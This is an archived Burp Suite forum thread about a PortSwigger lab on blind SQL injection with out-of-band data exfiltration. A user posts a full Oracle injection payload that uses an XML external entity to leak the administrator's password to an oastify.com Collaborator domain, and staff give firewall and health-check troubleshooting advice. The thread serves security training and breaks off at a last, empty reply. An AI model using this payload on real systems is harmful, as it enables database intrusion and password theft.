Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Blind SQL injection with out-of-band data exfiltration

Yan | Last updated: Sep 02, 2022 02:17PM UTC

Hi Team, Same issue the oatify.com does not work on my collaborator. Please see my payload below: ' || SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password from users where username='administrator')||'.lg533no4d4xfpdxezno2qlhg47axym.oastify.com"> %remote;]>'),'/l') FROM dual--

Michelle, PortSwigger Agent | Last updated: Sep 02, 2022 03:02PM UTC

To poll for results using the Collaborator client, the machine where you have Burp installed will need to be able to access oastify.com, so you may need to check if this is being blocked by a firewall. You can test connectivity by going to Project Options -> Misc -> Burp Collaborator Server -> Run health check. I hope this helps.

Yan | Last updated: Sep 03, 2022 05:08PM UTC

Hi Michelle, thanks for responding!Very appreciated! I have a mac is it the same steps by steps process to run the health check?

Michelle, PortSwigger Agent | Last updated: Sep 05, 2022 09:53AM UTC

Hi Yes, it's the same steps to run the Collaborator health check on a mac

Eduard | Last updated: Jan 16, 2023 02:50PM UTC

I have the same issue, health check showed me that there is only issue with SMTP

Michelle, PortSwigger Agent | Last updated: Jan 16, 2023 04:46PM UTC